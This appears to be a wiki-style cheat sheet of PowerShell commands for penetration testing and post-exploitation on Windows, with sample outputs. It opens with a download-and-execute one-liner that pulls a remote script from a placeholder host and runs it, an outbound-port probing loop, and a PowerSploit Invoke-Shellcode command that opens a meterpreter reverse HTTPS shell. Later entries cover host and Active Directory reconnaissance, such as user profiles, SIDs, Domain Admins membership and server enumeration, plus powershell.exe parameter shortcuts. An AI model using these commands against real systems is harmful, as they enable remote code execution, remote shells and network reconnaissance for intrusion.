Download and Execute Remote Powershell Script
iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")
Download and Save File
(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')
Enumerate Allowed Outbound Ports 1-1024 via securitypadawan.blogspot.com
$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}
Reverse Shell Using PowerSploit's Invoke-Shellcode
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
- Command with arguments:
gwmi win32_bios
- Description: Retrieves BIOS information including system serial number.
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32_bios
SMBIOSBIOSVersion : 6.00
Manufacturer : Phoenix Technologies LTD
Name : PhoenixBIOS 4.0 Release 6.0
SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
Version : INTEL - 6040000
-
- Command with arguments:
[System.IO.DriveInfo]::GetDrives()
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()
Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 55568087552
TotalFreeSpace : 55568087552
TotalSize : 159876850304
RootDirectory : C:\
VolumeLabel :
Name : D:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : D:\
VolumeLabel :
Name : G:\
DriveType : Removable
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : G:\
VolumeLabel :
Name : V:\
DriveType : Network
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 259182640616
TotalFreeSpace : 259182640616
TotalSize : 827361812256
RootDirectory : V:\
VolumeLabel : TestMappedDrive
-
- Command with arguments:
gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
- Description: Retrieves information about system users.
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto
Name SID LastUseTime localpath
---- --- ----------- ---------
WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
WIN-244VDGE5OGH S-1-5-20 C:\Windows\ServiceProfiles\Netwo...
WIN-244VDGE5OGH S-1-5-19 C:\Windows\ServiceProfiles\Local...
WIN-244VDGE5OGH S-1-5-18 C:\Windows\system32\config\syste...
-
- Command with arguments:
((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
-
- Command with arguments:
$cred = Get-Credential
- Description: Stores valid credentials in the $cred variable for use with the Active Directory Modules.
- Notes: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)
- Command with arguments:
Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"
- Output:
-
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
-
- Command with arguments:
Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name
- Output:
-
**Windows 7:** Show/Hide
name
----
PWNT-DC
-
Exchange1
SharePoint1
Parameter Shortcut(s)
- Command
c
- EncodedArguments
ea
,encodeda
- EncodedCommand
e
,ec
- ExecutionPolicy
ex
,ep
- File
f
- Help
-h
,-?
or/h
,/?
- InputFormat
i
,if
- NoExit
noe
- NoLogo
nol
- NoProfile
nop
- NonInteractive
noni
- OutputFormat
o
,of
- Sta
s
- WindowStyle
w
Parameter - Shortcut(s)
- File -
f
- Help -
-h
,-?
or/h
,/?
- Mta -
m
- NoProfile -
n
- Command with arguments:
[System.IO.DriveInfo]::GetDrives()
- Output:
-
**Windows 7:** Show/Hide
Name : C:
DriveType : Fixed DriveFormat : NTFS IsReady : True AvailableFreeSpace : 111111111111 TotalFreeSpace : 111111111111 TotalSize : 111111111111 RootDirectory : C:
VolumeLabel : HP
Name : D:
DriveType : Fixed DriveFormat : NTFS IsReady : True AvailableFreeSpace : 111111111111 TotalFreeSpace : 111111111111 TotalSize : 111111111111 RootDirectory : D:
VolumeLabel : DATA
Name : E:
DriveType : CDRom DriveFormat : IsReady : False AvailableFreeSpace : TotalFreeSpace : TotalSize : RootDirectory : E:
VolumeLabel : -
- Command with arguments:
gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *
- Output:
-
**Windows 7:** Show/Hide
__NounName : Process Name : firefox Handles : 383 VM : 272830464 WS : 90185728 PM : 69402624 NPM : 24676 Path : C:\Program Files\Mozilla Firefox\firefox.exe Company : Mozilla Corporation CPU : 2.1684139 FileVersion : 26.0 ProductVersion : 26.0 Description : Firefox Product : Firefox Id : 3176 PriorityClass : Normal HandleCount : 383 WorkingSet : 90185728 PagedMemorySize : 69402624 PrivateMemorySize : 69402624 VirtualMemorySize : 272830464 TotalProcessorTime : 00:00:02.1684139 BasePriority : 8 ExitCode : HasExited : False ExitTime : Handle : 1904 MachineName : . MainWindowHandle : 131426 MainWindowTitle : Mozilla Firefox Start Page - Mozilla Firefox MainModule : System.Diagnostics.ProcessModule (firefox.exe) MaxWorkingSet : 1413120 MinWorkingSet : 204800 Modules : {System.Diagnostics.ProcessModule (firefox.exe), System.Diagnostics.ProcessModule (ntdll.d ll), System.Diagnostics.ProcessModule (kernel32.dll), System.Diagnostics.ProcessModule (KE RNELBASE.dll)...} NonpagedSystemMemorySize : 24676 NonpagedSystemMemorySize64 : 24676 PagedMemorySize64 : 69402624 PagedSystemMemorySize : 277804 PagedSystemMemorySize64 : 277804 PeakPagedMemorySize : 77041664 PeakPagedMemorySize64 : 77041664 PeakWorkingSet : 97169408 PeakWorkingSet64 : 97169408 PeakVirtualMemorySize : 281219072 PeakVirtualMemorySize64 : 281219072 PriorityBoostEnabled : True PrivateMemorySize64 : 69402624 PrivilegedProcessorTime : 00:00:00.4992032 ProcessName : firefox ProcessorAffinity : 1 Responding : True SessionId : 1 StartInfo : System.Diagnostics.ProcessStartInfo StartTime : 1/29/2014 8:02:12 PM SynchronizingObject : Threads : {2664, 772, 3160, 544...} UserProcessorTime : 00:00:01.6692107 VirtualMemorySize64 : 272830464 EnableRaisingEvents : False StandardInput : StandardOutput : StandardError : WorkingSet64 : 90185728 Site : Container :
-
- Command with arguments:
((New-Object System.Security.Principal.SecurityIdentifier("<ssid>")).translate([System.Security.Principal.NTAccount])).value
- Output:
-
**Windows 7:** Show/Hide
NT AUTHORITY\SELF
-
- Command with arguments:
gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
- Output:
-
**Windows 7:** Show/Hide
WIN-C77DTCDJS11 S-1-5-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx-xxxx x/xx/2014 x:xx:xx PM C:\Users\xxxx
WIN-C77DTCDJS11 S-1-5-20 C:\Windows\ServiceProfiles\Netwo...
WIN-C77DTCDJS11 S-1-5-19 C:\Windows\ServiceProfiles\Local...
WIN-C77DTCDJS11 S-1-5-18 C:\Windows\system32\config\syste...